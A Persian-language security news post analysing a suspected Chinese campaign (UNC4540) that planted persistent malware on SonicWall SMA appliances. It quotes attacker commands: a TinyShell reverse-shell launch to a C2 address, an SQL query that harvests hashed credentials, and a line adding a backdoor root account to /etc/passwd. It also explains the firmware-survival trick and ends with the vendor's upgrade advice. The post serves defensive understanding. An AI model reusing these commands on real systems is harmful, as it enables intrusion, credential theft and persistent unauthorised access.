Skip to content

ONHEXGROUP

اخبار دنیای امنیت سایبری

  • اخبار
    • آسیب پذیری امنیتی
    • آنالیز بدافزار
    • کنفرانس ،دوره ، وبینار ، لایو ، CTF
    • بازیگران تهدید
    • توسعه اکسپلویت
    • افشای اطلاعات
    • باگ بانتی
    • تیم آبی
    • تیم قرمز
    • امنیت وب
  • دوره های آموزشی
    • دوره رایگان مهندسی معکوس نرم افزار
  • لیست های ویژه
    • موتورهای جستجو برای امنیت سایبری
    • کاتالوگ KEV آژانس CISA
    • آسیب پذیری های وردپرس
      • آسیب پذیری پلاگین ها
      • آسیب پذیری های هسته
      • آسیب پذیری تم ها
    • محصولات خارج از پشتیبانی مایکروسافت
      • محصولات مایکروسافتی که در سال 2022 پشتیبانی نمیشن
      • محصولات مایکروسافتی که در سال 2023 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2024 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2025 پشتیبانی نمیشن
    • معرفی فیلم ها و سریالهای مرتبط با هک و امنیت
  • آموزش های ویدیویی
  • انتشارات
    • مجله
    • مقالات
    • پادکست
  • پروژه ها
    • ماشین آسیب پذیر
      • وردپرس آسیب پذیر
  • حمایت مالی ( Donate)
  • تماس با ما
 
  • Home
  • اخبار
  • آنالیز بدافزار
  • اخبار
  • بازیگران تهدید

محصول SonicWall SMA هدف بدافزاری یه گروه احتمالا چینی

On اسفند 20, 1401فروردین 28, 1402
seyyid
Share
زمان مطالعه: 3 دقیقه

محققای Mandiant و SonicWall یه کمپین احتمالا چینی رو کشف کردن که محصول SonicWall Secure Mobile Access (SMA) رو با یه بدافزار هدف قرار میده و اسمش UNC4540 گذاشتن.

SMA بعنوان یه gateway عمل میکنه و سازمانها میتونن باهاش به هر برنامه ای ، از هرجایی و هر زمانی و با هر دستگاهی دسترسی داشته باشن.جزء دستگاههای دسترسی از راه دور هستش.

بطور کلی عملکرد بدافزار، سرقت اطلاعات کاربران، دسترسی به شل و پرسیست هستش ،بطوریکه حتی با آپگرید فریمور هم این پرسیست از بین نمیره.

محققا نتونستن منشا اولیه آلودگی رو شناسایی کنن اما اعلام کردن که بدافزار یا نسخه های مختلف اون از سال 2021 در دستگاه مستقر بوده، با اینکه چندین بار فریمورش بروزرسانی شده.

 

 

بررسی بدافزار:

این بدافزار از یسری اسکیپت bash و یه فایل اجرایی ELF که نوعی TinyShell هستش، تشکیل شده. بررسی اسکریپتها نشون میده که بازیگر تهدید شناخت خوبی از دستگاه داشته. جدول زیر فایلهای مخرب این کمپین رو نشون میده:

 

Path Hash Function
/bin/firewalld e4117b17e3d14fe64f45750be71dbaa6 Main malware process
/bin/httpsd 2d57bcb8351cf2b57c4fd2d1bb8f862e TinyShell backdoor
/etc/rc.d/rc.local 559b9ae2a578e1258e80c45a5794c071 Boot persistence for firewalld
/bin/iptabled 8dbf1effa7bc94fc0b9b4ce83dfce2e6 Redundant main malware process
/bin/geoBotnetd 619769d3d40a3c28ec83832ca521f521 Firmware backdoor script
/bin/ifconfig6 fa1bf2e427b2defffd573854c35d4919 Graceful shutdown script

 

بدافزار با اجرای اسکریپت firewalld شروع میشه. این اسکریپت مسئول اجرای دستور SQL برای سرقت اطلاعات کاربران و اجرای سایر مولفه های بدافزار هستش.

بدافزار firewalld در ابتدا یه بکدور با httpsd از طریق دستور زیر فعال میکنه (TinyShell) :

 

1
nohup /bin/httpsd -c<C2 IP ADDRESS> -d 5 -m -1 -p 51432 > /dev/null 2>&1 &

 

این دستور یه reverse-shell رو پیاده میکنه و دستور میده تا IP و پورت مورد نظر رو در روز و ساعت مشخصی که با m مشخص شده و با دوره زمانی که توسط d مشخص شده ، فراخوانی کنه. باینری یه IP هاردکد شده هم داره که اگه در دستور جای IP خالی بود به اون وصل بشه. همچنین قابلیت listening bind shell رو هم میده.

هدف اصلی بدافزار سرقت اطلاعات کاربران بصورت هش هستش. این کار با دستور زیر روی دیتابیس sqlite3  که در /tmp/temp.db قرار داره انجام میشه:

 

1
select userName,password from Sessions

 

با این کار اطلاعات کاربری که بصورت هش هستش رو استخراج کرده و در فایلی در مسیر /tmp/syslog.db کپی میکنه. مهاجم میتونن این هش ها رو از دستگاه بیرون بکشه و بصورت آفلاین اونارو کرک کنه.

اما نکته ای که این بدافزار داره، پرسیست اون هستش. این کار هم همونطور که بالا گفته شد، جوری انجام میده که حتی با بروزرسانی فریمور هم از دست نمیره.

برای پرسیست یه اسکریپت استارت آپی با نام rc.local استفاده کردن که firewalld رو در زمان بوت سیستم اجرا میکنه. همچنین یه نسخه دومی از firewalld هم وجود داره بنام iptabled ، که تنها توسط rc.local قابل اجراست و مهاجمین اونو قرار دادن تا اگه یه زمانی پروسس اصلی یعنی firewalld دچار مشکل شد، این دومی اجرا بشه و دسترسی نپره.

همچنین یه اسکریپت دیگه بنام geoBotnetd هم دارن که هر 10 ثانیه مسیر /cf/FIRMWARE/NEW/INITRD.GZ رو برای فریمور جدید چک میکنه . اگه نسخه جدیدی از فریمور در دسترس باشه، از فایلش یه بک آپ میگیره، بعدش اونو از حالت فشرده خارج کرده و فایلهای بدافزار رو داخل اون قرار میده. با این ترفند، اگه فریمور دستگاه هم بروز بشه، بازم آلودگی وجود داره. این تکنیک قبلا توسط یه گروه چینی روی دستگاههای Pulse Secure VPN استفاده شده بود.

همچنین اسکریپت geoBotnetd با استفاده از دستور زیر یه کاربر بکدور به دستگاه اضافه میکنه تا اگه دسترسی بپره، از طریق این کاربر دوباره وارد دستگاه بشن:

 

1
echo -e "acme:wegB/YNBuL7QI:0:0:pwned:/acme:/bin/bash\n" >> /sda/etc/passwd

 

همچنین firewalld یه دستکاری هم روی یکی از فایلهای SonicWall بنام firebased انجام میده. در این دستکاری با استفاده از دستور sed رشته /sbin/shutdown -r now رو با bash /bin/ifconfig6 جایگزین میکنه و بعدش اسکریپت /bin/ifconfig6 رو ایجاد میکنه

 

1
2
3
4
#!/bin/sh
ifconfig eth0 down
sleep 90
/sbin/shutdown -r now

 

محققا میگن احتمالا علت این کار اینه که مهاجمین در مراحل تست یا استفاده از بدافزار، وقتی firebased شات داون میشه با مشکلاتی روبرو بودن.

 

دفاع و شناسایی :

SonicWall به مشتریان SMA100 توصیه کرده به نسخه های 10.2.1.7 یا بالاتر ارتقاء بدن. در این نسخه ها یسری ایمنی بیشتر مثله File Integrity Monitoring (FIM) برای شناسایی پچ های دستکاری شده انجام دادن. این بروزرسانی امکان شناسایی و دفع این کمپین رو فراهم میکنه.

 

منبع

 

 

اشتراک در شبکه های اجتماعی :

Facebook
Twitter
Pinterest
LinkedIn
In آنالیز بدافزار اخبار بازیگران تهدیدIn firewalld , iptabled , mandiant , SonicWall , UNC4540

راهبری نوشته

مقدمه ای بر امنیت اتریوم
حمله BEC در 127 دقیقه

دیدگاهتان را بنویسید لغو پاسخ

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دسته‌ها

  • Osint
  • آسیب پذیری امنیتی
  • آموزش های ویدیویی
  • آنالیز بدافزار
  • اخبار
  • افشای اطلاعات
  • امنیت وب
  • انتشارات
  • اینترنت اشیاء
  • بازیگران تهدید
  • باگ بانتی
  • پادکست
  • پروژه ها
  • توسعه اکسپلویت
  • تیم آبی
  • تیم قرمز
  • دوره های آموزشی
  • فازینگ
  • کنفرانس ،دوره ، وبینار ، لایو ، CTF
  • لیست های ویژه
  • ماشین آسیب پذیر
  • مجله
  • مقالات
  • مهندسی معکوس نرم افزار

بایگانی‌ها

  • می 2025
  • آوریل 2025
  • مارس 2025
  • فوریه 2025
  • ژانویه 2025
  • دسامبر 2024
  • نوامبر 2024
  • اکتبر 2024
  • سپتامبر 2024
  • آگوست 2024
  • جولای 2024
  • ژوئن 2024
  • می 2024
  • آوریل 2024
  • مارس 2024
  • فوریه 2024
  • ژانویه 2024
  • دسامبر 2023
  • نوامبر 2023
  • اکتبر 2023
  • سپتامبر 2023
  • آگوست 2023
  • جولای 2023
  • ژوئن 2023
  • می 2023
  • آوریل 2023
  • مارس 2023
  • فوریه 2023
  • ژانویه 2023
  • دسامبر 2022

پست های مرتبط

  • اخبار
  • تیم آبی
  • تیم قرمز
  • مقالات
seyyid
On آذر 27, 1403

انتشار نسخه ی Kali Linux 2024.4

  • اخبار
  • افشای اطلاعات
  • بازیگران تهدید
seyyid
On آذر 1, 1402آذر 2, 1402

هک مرکز تحقیقات INL توسط گروه هکری SiegedSec

  • آسیب پذیری امنیتی
  • اخبار
  • مقالات
seyyid
On دی 1, 1401دی 19, 1401

بررسی Patch Tuesday مایکروسافت برای مه 2022 (اردیبهشت 1401)

  • اخبار
  • افشای اطلاعات
  • بازیگران تهدید
seyyid
On مرداد 21, 1403مرداد 22, 1403

احتمال هک ستاد انتخاباتی ترامپ توسط هکرهای ایرانی

درباره ما

بعد از چندین سال فعالیت تو حوزه امنیت سایبری و تولید محتوا در شبکه های اجتماعی ، بالاخره تصمیم گرفتیم تا یه سایت راه اندازی کنیم و مطالب رو ساده تر ، در یک محیط منسجم و طبقه بندی شده به دست مخاطب برسونیم. امیدوارم که قدمی در راستای رشد امنیت سایبری کشورمون برداشته باشیم.

تگ ها

0day APT command injection Deserialization of Untrusted Data Directory Traversal FBI Fortinet Heap buffer overflow integer overflow kali LockBit Memory Corruption nuclei Off By One Security out-of-bounds write Out of bounds read Patch Tuesday PWN2OWN Stack Buffer overflow type confusion use after free vulnerable wordpress XSS ZDI vulnerability آموزش اکسپلویت نویسی ارز دیجیتال اندروید اپل اکسپلویت باج افزار تلگرام زیرودی سیسکو فارنزیک فورتی نت فیشینگ لاک بیت مایکروسافت هوش مصنوعی وردپرس وردپرس آسیب پذیر ویندوز پلاگین کروم گوگل

شبکه های اجتماعی

    • Instagram
    • Telegram
    • Twitter
    • GitHub
    • YouTube
    • LinkedIn
      کپی مطالب با ذکر منبع بلامانع است | 1401-1404